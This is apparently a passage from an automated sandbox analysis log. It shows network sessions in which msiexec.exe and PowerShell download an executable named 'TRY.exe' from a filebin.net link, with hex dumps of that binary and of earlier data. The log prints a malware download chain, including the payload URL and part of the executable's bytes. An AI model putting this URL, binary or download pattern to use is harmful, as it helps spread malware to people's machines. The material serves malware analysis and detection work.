fe ff ff 3c 3a 0f 85 b0 fe Data Ascii: )I<AtG<Dt:<It-<Nt <Pt<StA;}r+-?d(%jr%ar$d@=PrD%`uJL$(HD$AAHD$ Lx-A%+D$Buf=`<:HL$C(<1t<At<UtfD%`D$BuD%d`<:
2022-04-20 07:28:15 UTC	369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 11 00 00 b7 11 00 00 90 9c 00 00 c0 11 00 00 b8 12 00 00 9c 9c 00 00 c0 12 00 00 89 14 00 00 b8 9c 00 00 90 14 00 00 53 15 00 00 dc 9c 00 00 5c 15 00 00 ef 15 00 00 f4 9c 00 00 f8 15 00 00 3c 1b 00 00 08 9d 00 00 44 1b 00 00 31 1c 00 00 2c 9d 00 00 38 1c 00 00 fa 1e 00 00 3c 9d 00 00 00 1f 00 00 ba 20 00 00 60 9d 00 00 c0 20 00 00 6c 21 00 00 80 9d 00 00 74 21 00 00 95 22 00 00 98 9d 00 00 9c 22 00 00 1e 23 00 00 a4 9d 00 00 24 23 00 00 40 24 00 00 bc 9d 00 00 48 24 00 00 21 26 00 00 d0 9d 00 00 28 26 00 Data Ascii: DS\<D1,8< ` l!t!""#$#@$H$!&(&
2022-04-20 07:28:15 UTC	385	IN	Data Raw: 00 00 00 00 88 ff ff ff f8 8f ff 8f 8f f8 88 88 85 78 88 70 00 00 00 00 00 00 00 00 7f ff ff ff ff f8 88 88 77 78 78 77 88 7c 88 80 00 00 00 00 00 00 00 00 88 f8 88 87 77 67 77 77 78 78 88 88 88 88 88 88 00 00 00 00 00 00 00 00 78 77 87 67 67 77 87 88 88 88 88 88 88 88 78 87 00 00 00 00 00 00 00 00 78 88 77 78 88 88 f8 8f 8f 8f 8f 8f 8f 88 8c f8 80 00 00 00 00 00 00 00 88 88 87 88 ff ff ff f8 f8 f8 8f 88 88 88 88 78 70 00 00 00 00 00 00 00 78 88 78 88 f8 f8 f8 f8 f8 ff 88 f8 ff 8f 88 87 80 00 00 00 00 00 00 00 78 88 88 78 f8 ff 8f 8f f8 f8 f8 f8 88 88 88 80 00 00 00 00 00 00 00 00 88 88 78 88 ff 8f 8f f8 8f 88 88 88 88 88 88 70 00 00 00 00 00 00 00 00 87 88 80 08 88 88 88 88 88 88 88 87 87 87 87 00 00 00 00 00 00 00 00 00 00 00 00 08 88 88 88 88 78 88 88 Data Ascii: xpwxxw\|wgwwxxxwggwxxwxxpxxxxxpx
2022-04-20 07:28:15 UTC	401	IN	Data Raw: 9c 26 e7 2e 0f 83 41 64 ed 4b 21 10 ce d2 af 87 2a 80 21 97 06 0c 26 75 e7 53 53 2c 0a 72 2b d8 cc 09 a9 20 b7 01 14 52 85 ad 81 fd fe b1 a6 9f a5 f4 dc e6 fb d8 46 1f c7 24 dd 33 8f d8 9b f6 6f 9c 4e 9e 9b f4 c8 c7 db 9d 5c d7 a2 b4 2a 8b ff 34 fd fb fd c4 b8 a4 f4 e8 f7 db 27 72 20 9e 95 1e 16 8e 56 6a 04 7c 90 36 84 49 ab ad 7e f9 97 7f 73 af db ed c7 49 92 12 04 7e 11 fd 97 45 f7 e9 cc 72 6b 32 f7 9e 35 a3 91 82 a3 52 c0 88 17 20 3f f6 ad b1 7f 14 f8 97 45 4f c4 06 14 08 c8 ad cb 65 9a 2c 05 08 46 03 59 96 33 ce e5 65 4e 2b 9b 2f 1a 9a 4d 27 c3 7d e7 a1 f1 b6 e7 eb f7 22 f5 2f da a3 47 47 49 12 c5 f7 ef bf f7 fa a4 6b f3 ae 14 9c 94 2e ff 61 d9 e3 96 8e 04 5c a5 65 73 d9 28 43 21 78 67 30 88 7b 71 9c a2 86 09 30 0a 57 9f d6 64 2e 42 0b 23 de 81 5c 05 Data Ascii: &.AdK!!&uSS,r+ RF$3oN\4'r Vj\|6I~sI~Erk25R ?EOe,FY3eN+/M'}"/GGIk.a\es(C!xg0{q0Wd.B#\
2022-04-20 07:28:15 UTC	417	IN	Data Raw: cb 11 5e 9f 06 d3 dc 7d 41 e1 e7 48 7c a8 02 0c 7b db 36 3f 49 7f 27 7f 7e 6b ee a7 40 5d f2 e3 7d 58 6f bb be ef 4e 1d 0a 6d d6 8c 09 29 c0 5c 28 a4 d2 b1 38 2b 59 78 a1 1d 79 42 18 84 fe 0c c9 9d e8 df 91 8e 95 e4 ab bd fb 75 9b fb 70 57 37 20 f9 f5 5a 6b b2 7c c0 b0 28 28 ca 32 7c 8a 21 4a b5 45 69 09 9e 1e 40 62 a1 ca b4 8e 69 4e 6b 2d 83 c1 98 f1 b8 d8 ee f7 eb a0 b7 8d 1c bc 73 1a f0 2e 27 30 1c 0e 4d 96 65 0d e0 bb 37 a8 cb 1c 09 f4 d3 e2 02 42 33 cc d6 3f df df 6f 94 ca f9 e3 c7 8f eb a7 4f bf 12 79 5e 72 7e 71 8e 31 1b 3e f9 e4 1f 78 fa ec 2b 74 96 6f a5 37 b4 8c d6 3d 76 62 e8 2e f3 76 2d 8f fe f6 e9 dc fb d7 72 1b 6d 21 bf 07 84 41 f7 f7 ee be fb fd 13 bb d6 09 10 05 80 47 23 d1 42 d2 58 43 e3 42 bf 01 4c 28 62 2a 87 13 f2 ec 84 c6 3a 5c 63 19 Data Ascii: ^}AH\|{6?I'~k@]}XoNm)\(8+YxyBupW7 Zk\|((2\|!JEi@biNk-s.'0Me7B3?oOy^r~q1>x+to7=vb.v-rm!AG#BXCBL(b*:\c
2022-04-20 07:28:15 UTC	433	IN	Data Raw: c6 8a 2c 75 ae c1 aa 8a 59 c5 35 45 d5 50 d6 0d 95 cf bb 68 b4 03 41 c3 ef 61 ad 8b c8 48 e1 aa 2f f1 dd 93 94 92 48 a1 5d ca 72 a3 c1 1a e2 38 02 65 a9 6c 89 ad 0d 30 70 89 49 c6 f8 c4 a0 f0 1b 75 31 81 f3 dc 80 b3 02 20 bc 3e b3 8f 65 a3 4c fa 69 50 07 f2 78 a0 05 10 e8 1b df f8 86 00 27 0c fc fb 5f 88 2c 86 27 2e 00 4e 4e 4e 58 2c 16 5a 29 65 42 0f fc 60 5a b6 20 60 00 a2 c2 55 14 d6 25 b3 00 d6 5a ab b5 2e 8c 31 ec ed ed fd 89 37 df 7c f3 c3 ef 7c e7 3b 95 90 62 7c 7c 7c f4 d3 83 83 83 eb 42 46 51 53 e6 58 bb 39 2e bc 1f 01 e8 32 7b 77 5b d8 be 16 4a 6b c0 ab 35 ff 7d e5 5f 92 24 4c 26 13 46 a3 11 79 9e b3 58 2c 30 c6 0d f3 3c 3e 3e a2 ae 4a c6 7b 7b ae 9d b7 8c 5d f9 ae 14 a0 24 c2 0f b1 70 4c e0 46 81 c7 42 92 8c 52 46 d9 80 38 49 68 ea 86 b2 2c b0 Data Ascii: ,uY5EPhAaH/H]r8el0pIu1 >eLiPx'_,'.NNNX,Z)eB`Z `U%Z.17\|\|;b\|\|\|BFQSX9.2{w[Jk5}_$L&FyX,0<>>J{{]$pLFBRF8Ih,
2022-04-20 07:28:15 UTC	449	IN	Data Raw: 71 ee 07 d4 fd 94 b0 7b 35 4d 5f cb 35 a1 0b ae 25 18 2b ad 32 56 6e 1d ce d3 fe 62 11 a0 50 b0 f0 c6 1b e7 0a 07 0e 1c 7c 2f 97 9b 78 fc d2 a5 c1 7f a0 64 c2 cb f7 ef df 1f 2d f4 95 13 fb 22 53 de 38 6c 45 3a 35 8e e2 96 7e ab 2e 02 56 4a 03 ad 48 07 9d 20 a8 38 a4 94 66 62 1e b4 53 4e 5c 75 89 70 26 93 25 9f af b3 c8 78 df 17 1f 8e b6 1b 2f ff fd c4 6b a7 28 d3 7b 08 21 6b 1c e9 6e 92 81 7b 3b 43 b0 dd f6 dc cd cc 73 6f 21 52 ac 37 34 d2 d3 cb 2d a1 13 97 7a 41 91 d8 3e e0 04 14 b6 e4 70 1d 1d 96 3d 83 c2 ac 00 a5 02 82 eb d0 8d 04 28 13 28 58 0e 2c cb 81 27 03 48 0a 7c 34 3d 85 e2 f0 79 2a 6d 07 8c 72 c6 18 83 ef fb 11 61 5d d3 41 e6 27 3f f9 ce 65 00 97 33 99 cc af 00 e0 c0 81 e3 1b ec 59 eb eb 80 7a 84 52 d6 af 69 7a 2f e7 42 70 2e 44 78 0a 0f a4 f4 Data Ascii: q{5M_5%+2VnbP\|/xd-"S8lE:5~.VJH 8fbSN\up&%x/k({!kn{;Cso!R74-zA>p=((X,'H\|4=y*mra]A'?e3YzRiz/Bp.Dx
2022-04-20 07:28:15 UTC	465	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5b 5c 5c 3f 3e 3e 3d f5 8f 87 8a ff b0 b2 b2 ff 9b ae 87 ff b2 ad 8b ff e6 e2 e1 ff ec e9 e4 ff ca c9 c7 ff 97 95 99 ff 94 90 97 ff 99 91 99 ff aa b8 c9 ff bd b9 bf ff e5 c3 c2 ff f8 f1 f1 ff c2 b7 b7 ff e4 d4 d4 ff b6 9b 9b f4 a4 85 85 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5d 5e 5e 40 4a 41 43 f6 7f a4 97 ff 4e e3 9d ff 77 b4 7b ff a4 9f 98 ff c7 c5 c6 ff ea e8 e7 ff da da da ff b1 b2 b2 ff 9a 98 96 ff 99 9b 9c ff 87 be e1 ff ad ba c7 ff e8 c6 c5 ff fa f2 f2 ff c2 b7 b9 ff e7 d6 d6 ff b7 9c 9c f4 a1 83 83 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 5f 5f 41 51 46 4a f6 95 c2 b0 ff 5a c7 9b ff 9d 9e 9f ff b5 b2 b4 ff ce ce ce ff f0 f0 f0 ff f0 f0 f0 ff cd cd ce ff b8 b2 ae ff a7 be ce Data Ascii: [\\?>>=]^^@JACNw{^__AQFJZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49775	185.47.40.36	443	C:\Windows\System32\msiexec.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-20 07:28:44 UTC	481	OUT	GET /rf43v6qzghbj7h7b/TRY.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: filebin.net Connection: Keep-Alive
2022-04-20 07:28:44 UTC	482	IN	HTTP/1.1 302 Found Cache-Control: max-age=0 Location: https://situla.bitbit.net/filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/7ff329000ec5f0e56f28414ebbe22f0c0905296169e7398f417a543e662f9503?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T072844Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.exe%22&response-content-type=application%2Fvnd.microsoft.portable-executable&X-Amz-Signature=c205dd25825136b9a5d453fd33964b1791fdc2217c3bde2a85904dc7ce3c2af9 X-Robots-Tag: noindex Date: Wed, 20 Apr 2022 07:28:44 GMT Content-Length: 0 X-Varnish: 393425 Age: 0 Via: 1.1 varnish (Varnish/6.0) Access-Control-Allow-Origin: * Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49776	87.238.33.7	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-20 07:28:44 UTC	482	OUT	GET /filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/7ff329000ec5f0e56f28414ebbe22f0c0905296169e7398f417a543e662f9503?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T072844Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.exe%22&response-content-type=application%2Fvnd.microsoft.portable-executable&X-Amz-Signature=c205dd25825136b9a5d453fd33964b1791fdc2217c3bde2a85904dc7ce3c2af9 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: situla.bitbit.net Connection: Keep-Alive
2022-04-20 07:28:44 UTC	483	IN	HTTP/1.1 200 OK Content-Length: 473600 Accept-Ranges: bytes Last-Modified: Wed, 20 Apr 2022 01:16:13 GMT ETag: "97b73ca76ec68b6580151220097a1292" Cache-Control: max-age=30 Content-Disposition: filename="TRY.exe" x-amz-request-id: tx00000000000000076dcf0-00625fb62c-3b4f93f3-default Content-Type: application/vnd.microsoft.portable-executable Date: Wed, 20 Apr 2022 07:28:44 GMT Connection: close
2022-04-20 07:28:44 UTC	484	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 08 3b 92 41 4c 5a fc 12 4c 5a fc 12 4c 5a fc 12 f8 c6 0d 12 5f 5a fc 12 f8 c6 0f 12 ea 5a fc 12 f8 c6 0e 12 52 5a fc 12 45 22 78 12 4d 5a fc 12 d2 fa 3b 12 4e 5a fc 12 77 04 ff 13 56 5a fc 12 77 04 f9 13 76 5a fc 12 77 04 f8 13 6e 5a fc 12 45 22 6f 12 59 5a fc 12 4c 5a fd 12 65 5b fc 12 db 04 f5 13 13 5a fc 12 de 04 03 12 4d 5a fc 12 db 04 fe 13 4d 5a fc 12 52 69 63 68 4c 5a fc Data Ascii: MZ@!L!This program cannot be run in DOS mode.$;ALZLZLZ_ZZRZE"xMZ;NZwVZwvZwnZE"oYZLZe[ZMZMZRichLZ
2022-04-20 07:28:44 UTC	500	IN	Data Raw: 24 10 e8 98 d4 ff ff 83 66 54 00 ff 76 58 e8 ad 36 03 00 ff 76 58 8b d8 8b ce 53 e8 4d ff ff ff 8b f8 85 ff 7e 47 57 53 8d 4c 24 48 e8 46 d4 ff ff 50 8d 4c 24 2c e8 67 d3 ff ff 8d 4c 24 40 e8 54 d3 ff ff 8d 44 24 28 50 8d 4c 24 14 e8 e4 e6 ff ff 29 7e 54 83 7e 54 00 7f 12 ff 75 0c 8d 44 24 14 8b ce ff 75 08 50 e8 2d 00 00 00 53 e8 48 36 03 00 59 85 ff 7f 93 8b ce e8 7e 01 00 00 8d 4c 24 10 e8 10 d3 ff ff 8d 4c 24 28 e8 07 d3 ff ff 5f 5e 5b 8b e5 5d c2 08 00 83 ec 38 83 64 24 04 00 53 55 56 8b f1 8d 4c 24 14 57 83 66 54 00 e8 ea d3 ff ff 8a 7c 24 54 8d 46 58 8b 7c 24 4c 50 8d 44 24 18 8b cf 50 e8 9e d2 ff ff 50 8b ce e8 fd 01 00 00 84 c0 0f 84 0d 01 00 00 0f b6 4e 30 8b 6c 24 14 89 4c 24 54 03 e9 8b cf e8 4a d7 ff ff 3b e8 76 12 8b cf b3 01 e8 3d d7 ff ff Data Ascii: $fTvX6vXSM~GWSL$HFPL$,gL$@TD$(PL$)~T~TuD$uP-SH6Y~L$L$(_^[]8d$SUVL$WfT\|$TFX\|$LPD$PPN0l$L$TJ;v=
2022-04-20 07:28:44 UTC	516	IN	Data Raw: 00 00 53 55 56 8b f1 8d 6e 60 68 d0 07 00 00 8d 44 24 5c 6a 00 50 e8 15 a8 02 00 83 c4 0c 6a 2a b9 a4 d3 46 00 e8 fb 91 ff ff 8b c8 e8 3a 93 ff ff 83 ec 18 8b cc 50 e8 02 b5 ff ff 8d 4c 24 70 e8 55 fa 00 00 83 c4 18 84 c0 75 0d 68 f4 01 00 00 ff 15 b4 42 45 00 eb c5 68 34 13 46 00 8d 44 24 5c 50 8d 4c 24 48 e8 d2 b4 ff ff 50 ba 40 13 46 00 8d 4c 24 30 e8 41 b6 ff ff 59 8b d0 8d 4c 24 14 e8 4d a3 ff ff 59 50 8d 4e 04 e8 42 92 ff ff 8d 4c 24 10 e8 2f 92 ff ff 8d 4c 24 28 e8 26 92 ff ff 8d 4c 24 40 e8 1d 92 ff ff 83 ec 18 8b cc 55 e8 48 ea ff ff 8b ce e8 3c fc ff ff 6a 2a b9 a4 d3 46 00 e8 5b 91 ff ff 8b c8 e8 9a 92 ff ff 83 ec 18 8b cc 50 e8 62 b4 ff ff 33 c9 e8 b7 f9 00 00 83 c4 18 84 c0 74 0a 6a 64 ff 15 b4 42 45 00 eb ca 8b ce e8 31 0a 00 00 e9 0a ff ff Data Ascii: SUVn`hD$\jPjF:PL$pUuhBEh4FD$\PL$HP@FL$0AYL$MYPNBL$/L$(&L$@UH<jF[Pb3tjdBE1
2022-04-20 07:28:44 UTC	532	IN	Data Raw: ff 8a 16 8d 4c 24 18 50 e8 1d c0 00 00 59 50 b9 d4 d0 46 00 e8 ba 52 ff ff 8d 4c 24 18 e8 a7 52 ff ff 33 c0 50 50 50 68 a9 1b 40 00 50 50 ff d7 be a4 d3 46 00 6a 2b 8b ce e8 e7 51 ff ff 8b c8 e8 26 53 ff ff 38 18 75 39 6a 2c 8b ce e8 d3 51 ff ff 8b c8 e8 12 53 ff ff 6a 2d b9 a4 d3 46 00 8b f0 e8 be 51 ff ff 8b c8 e8 fd 52 ff ff 50 e8 d8 b3 02 00 80 3e 00 8b d0 59 0f 95 c1 e8 30 db ff ff 8d 4c 24 18 e8 b1 ad 00 00 50 b9 08 d6 46 00 e8 3d 52 ff ff 8d 4c 24 18 e8 2a 52 ff ff a1 0c cd 46 00 33 db 85 c0 74 03 53 ff d0 53 53 53 68 1f d2 40 00 53 53 ff d7 80 3d 03 cd 46 00 00 74 0c 53 53 53 68 28 fc 40 00 53 53 ff d7 80 3d 58 cd 46 00 00 74 0c 53 53 53 68 46 01 41 00 53 53 ff d7 a1 c0 b9 46 00 2b c3 74 29 83 e8 01 75 62 68 04 1e 46 00 eb 22 68 9c 1d 46 00 8b ce Data Ascii: L$PYPFRL$R3PPPh@PPFj+Q&S8u9j,QSj-FQRP>Y0L$PF=RL$*RF3tSSSSh@SS=FtSSSh(@SS=XFtSSShFASSF+t)ubhF"hF
2022-04-20 07:28:44 UTC	548	IN	Data Raw: 00 ff 75 08 53 ff 15 7c 40 45 00 56 8b cf e8 2b 35 ff ff 8b c7 5f 5e 5b 8b e5 5d c3 55 8b ec 81 ec 10 04 00 00 8d 45 f8 56 50 68 19 00 02 00 33 f6 56 52 68 01 00 00 80 ff 15 68 40 45 00 85 c0 75 4a 8d 45 10 50 ff 75 0c 56 56 ff 75 08 ff 75 f8 ff 15 54 40 45 00 ff 75 f8 8b f0 ff 15 4c 40 45 00 85 f6 75 26 ff 75 18 8d 8d f4 fb ff ff ff 75 14 e8 71 4e ff ff ff 75 10 8d 8d f4 fb ff ff ff 75 0c e8 e5 4e ff ff b0 01 eb 02 32 c0 5e 8b e5 5d c3 55 8b ec 51 53 8d 45 fc 50 52 68 01 00 00 80 ff 15 48 40 45 00 85 c0 75 37 56 8d 4d 0c e8 87 17 ff ff 50 8d 4d 0c e8 ad 12 ff ff 50 ff 75 24 6a 00 ff 75 08 ff 75 fc ff 15 64 40 45 00 ff 75 fc 8b f0 ff 15 4c 40 45 00 85 f6 5e 0f 94 c3 eb 02 32 db 8d 4d 0c e8 ab 12 ff ff 8a c3 5b 8b e5 5d c3 55 8b ec 51 8d 45 fc 50 52 51 ff Data Ascii: uS\|@EV+5_^[]UEVPh3VRhh@EuJEPuVVuuT@EuL@Eu&uuqNuuN2^]UQSEPRhH@Eu7VMPMPu$juud@EuL@E^2M[]UQEPRQ
2022-04-20 07:28:45 UTC	564	IN	Data Raw: 34 4f 89 7d d0 eb b4 85 f6 75 2a 6a 00 ff 75 e8 8b 4d d4 e8 53 d3 fe ff 50 8b 03 8b 48 04 03 cb e8 5f a2 ff ff 8b c8 e8 ff a1 ff ff 3b 45 e8 75 4d 85 d2 75 49 85 ff 74 4b 8b 03 8b 48 04 03 cb e8 3b a2 ff ff 0f b6 c0 50 e8 36 a2 ff ff 8b c8 e8 ea a1 ff ff 89 45 d4 e8 00 e2 fe ff 89 45 e8 8d 45 d4 50 8d 45 e8 50 e8 75 6c ff ff 59 59 84 c0 74 05 83 ce 04 eb 09 4f 89 7d d0 eb b7 6a 04 5e 89 75 e4 6a 00 6a 00 8b 03 8b 48 04 03 cb e8 b4 75 ff ff 83 4d fc ff eb 23 6a 01 6a 04 8b 55 e0 8b 02 8b 48 04 03 ca e8 8c 9a ff ff b8 b3 4c 41 00 c3 83 4d fc ff 8b 5d e0 8b 75 e4 6a 00 56 8b 03 8b 48 04 03 cb e8 6d 9a ff ff 8d 4d c8 e8 e2 a0 ff ff 8b c3 8b 4d f4 64 89 0d 00 00 00 00 5f 5e 5b 8b e5 5d c3 83 ec 58 53 55 8b da b8 4d 5a 00 00 56 33 f6 8b e9 89 74 24 0c 66 39 03 Data Ascii: 4O}u*juMSPH_;EuMuItKH;P6EEEPEPulYYtO}j^ujjHuM#jjUHLAM]ujVHmMMd_^[]XSUMZV3t$f9
2022-04-20 07:28:45 UTC	580	IN	Data Raw: ec 18 8b cc 53 e8 49 94 fe ff 68 80 76 46 00 8b d6 e8 7d 80 ff ff 83 c4 20 6a 03 57 6a 00 6a 14 ff 15 bc 43 45 00 5f 5e 5b c3 55 8b ec 83 ec 34 53 56 ff 75 08 8b f1 8a da 8d 4d e4 e8 12 94 fe ff 8d 55 e4 8d 4d cc e8 51 f3 ff ff 8b c8 e8 71 92 fe ff 50 8a d3 8b ce e8 19 00 00 00 59 8d 4d cc e8 63 92 fe ff 8d 4d e4 e8 2a 93 fe ff 8b c6 5e 5b 8b e5 5d c3 55 8b ec 83 e4 f8 81 ec 84 02 00 00 53 56 57 8b f9 8a da 8d 4c 24 10 e8 b4 92 fe ff 0f be c3 83 c0 d0 83 f8 07 0f 87 15 01 00 00 ff 24 85 52 8e 41 00 68 b8 19 46 00 e9 f4 00 00 00 8d 4c 24 28 e8 28 ed ff ff 50 8d 4c 24 14 e8 0e 92 fe ff 8d 4c 24 28 e8 fb 91 fe ff e9 e3 00 00 00 68 94 76 46 00 e9 c9 00 00 00 68 d0 70 46 00 e9 bf 00 00 00 e8 e5 f5 ff ff 84 c0 75 52 68 bc 70 46 00 8d 4c 24 5c e8 40 b4 fe ff 50 Data Ascii: SIhvF} jWjjCE_^[U4SVuMUMQqPYMcM*^[]USVWL$$RAhFL$((PL$L$(hvFhpFuRhpFL$\@P
2022-04-20 07:28:45 UTC	596	IN	Data Raw: 8b 77 04 8a 87 30 02 00 00 88 86 56 01 00 00 0f b7 87 20 02 00 00 50 e8 98 d0 ff ff 83 c4 04 85 c0 74 1c 8b 47 04 c6 80 55 01 00 00 04 8a 8f 58 01 00 00 8b 47 04 80 e1 7f 88 88 56 01 00 00 83 7c 24 18 00 75 07 33 c0 e9 11 01 00 00 33 f6 46 39 74 24 18 0f 86 02 01 00 00 55 8d 44 24 13 c6 44 24 12 00 8d 4a ff c6 44 24 13 00 50 03 ce 8d 54 24 16 e8 69 d3 ff ff 0f b7 87 20 02 00 00 50 e8 2f d0 ff ff 8a 4c 24 1b 8b d0 83 c4 08 85 d2 74 56 8b 47 04 3a 88 56 01 00 00 75 36 80 f9 03 75 31 8a 4c 24 12 e8 13 d2 ff ff 85 c0 0f 8e 83 00 00 00 3b 87 5c 01 00 00 75 7b 8b 47 04 88 88 55 01 00 00 8b 47 04 c6 80 56 01 00 00 03 e9 86 00 00 00 85 d2 74 11 8b 47 04 80 b8 56 01 00 00 01 75 05 80 f9 08 75 4e 8b 6f 04 8a 85 56 01 00 00 3a c8 74 24 80 f9 08 75 04 3c 01 74 1b 80 Data Ascii: w0V PtGUXGV\|$u33F9t$UD$D$JD$PT$i P/L$tVG:Vu6u1L$;\u{GUGVtGVuuNoV:t$u<t
2022-04-20 07:28:45 UTC	612	IN	Data Raw: 04 56 57 8b fa 8b f1 75 6f 8b 96 84 00 00 00 51 8d 8d 6c ff ff ff e8 7f f2 00 00 59 85 c0 75 5d 50 33 d2 8d 8d 6c ff ff ff e8 78 f9 00 00 59 85 c0 75 4a 8d 55 dc 8d 8d 6c ff ff ff e8 40 fa 00 00 85 c0 75 38 80 be 21 02 00 00 04 74 07 b8 ba fe ff ff eb 28 6a 06 6a 20 5a 52 8d 45 dc 50 6a 07 68 5c 22 46 00 51 51 52 ff 75 0c 8b cf e8 f2 fe ff ff 83 c4 24 eb 05 b8 18 ff ff ff 5f 5e 8b e5 5d c3 83 ec 28 55 56 33 f6 8b c2 83 7c 24 44 04 8b ee 57 89 44 24 0c 8b fe 75 23 6a 20 5e 6a 06 5f 39 6c 24 4c 74 17 8b 49 6c 8d 54 24 10 83 c1 40 e8 13 fa 00 00 85 c0 75 35 8b 44 24 0c 8b 54 24 38 8d 4c 24 10 83 fa ff 57 0f 44 d6 39 6c 24 50 0f 45 ee 55 51 ff 74 24 50 ff 74 24 50 51 51 56 ff 74 24 5c 8b c8 e8 78 fe ff ff 83 c4 24 5f 5e 5d 83 c4 28 c3 56 85 c9 74 27 8b 71 08 Data Ascii: VWuoQlYu]P3lxYuJUl@u8!t(jj ZREPjh\"FQQRu$_^](UV3\|$DWD$u#j ^j_9l$LtIlT$@u5D$T$8L$WD9l$PEUQt$Pt$PQQVt$\x$_^](Vt'q
2022-04-20 07:28:45 UTC	628	IN	Data Raw: 6f ff ff ff 5e c3 80 7c 0e 01 00 74 07 b8 6e ff ff ff 5e c3 8d 46 02 89 02 33 c0 5e c3 56 8b 32 8d 46 03 3b 44 24 08 76 07 b8 7c ff ff ff 5e c3 80 3c 0e 01 74 07 b8 74 ff ff ff 5e c3 80 7c 0e 01 01 75 f2 8d 46 03 89 02 33 c0 38 44 0e 02 5e 0f 95 c0 c3 ff 74 24 08 ff 74 24 08 52 b2 04 e8 f4 fe ff ff 83 c4 0c c3 53 56 8b 74 24 0c 8b d9 57 ff 74 24 14 8b fa b2 02 56 57 e8 d8 fe ff ff 83 c4 0c 85 c0 78 2d 83 3e 00 7e 26 8b 07 80 3c 18 00 75 1e 83 3e 01 7e 19 40 89 07 ff 0e 83 3e 00 7e 0f 8b 07 80 3c 03 00 7c 07 b8 74 ff ff ff eb 02 33 c0 5f 5e 5b c3 55 8b ec 51 56 8b f2 8b 06 89 45 fc 83 c0 03 3b 45 08 76 07 b8 7c ff ff ff eb 38 ff 75 08 8d 45 0b 50 8d 55 fc e8 e3 fd ff ff 83 c4 08 85 c0 74 07 b8 74 ff ff ff eb 1b 80 7d 0b 02 75 f3 8b 55 fc 80 3c 0a 01 75 ea Data Ascii: o^\|tn^F3^V2F;D$v\|^<tt^\|uF38D^t$t$RSVt$Wt$VWx->~&<u>~@>~<\|t3_^[UQVE;Ev\|8uEPUtt}uU<u
2022-04-20 07:28:45 UTC	644	IN	Data Raw: 8a 02 00 00 8d 43 10 50 57 8d 54 24 28 8b c8 e8 df 53 00 00 8b f0 59 59 85 f6 0f 85 6e 02 00 00 8d 44 24 20 50 57 8b d0 8b c8 e8 e8 53 00 00 8b f0 59 59 85 f6 0f 85 53 02 00 00 8d 44 24 20 50 57 8d 53 10 8b c8 e8 cc 53 00 00 8b f0 59 59 85 f6 0f 85 37 02 00 00 53 57 8d 54 24 38 8b cb e8 8f 53 00 00 8b f0 59 59 85 f6 0f 85 1e 02 00 00 8d 44 24 30 50 57 8b d0 8b c8 e8 98 53 00 00 8b f0 59 59 85 f6 0f 85 03 02 00 00 8d 44 24 30 8b d3 50 57 8b c8 e8 7d 53 00 00 8b f0 59 59 85 f6 0f 85 e8 01 00 00 8b 4c 24 18 39 01 74 30 8d 43 20 8b d1 50 8b c8 e8 c2 53 00 00 8b f0 59 85 f6 0f 85 c8 01 00 00 55 8d 43 20 57 50 e8 e9 4e 00 00 8b f0 83 c4 0c 85 f6 0f 85 b0 01 00 00 8d 43 20 8b d3 50 8b c8 e8 92 53 00 00 8b f0 59 85 f6 0f 85 98 01 00 00 55 8d 43 20 57 50 e8 b9 4e Data Ascii: CPWT$(SYYnD$ PWSYYSD$ PWSSYY7SWT$8SYYD$0PWSYYD$0PW}SYYL$9t0C PSYUC WPNC PSYUC WPN
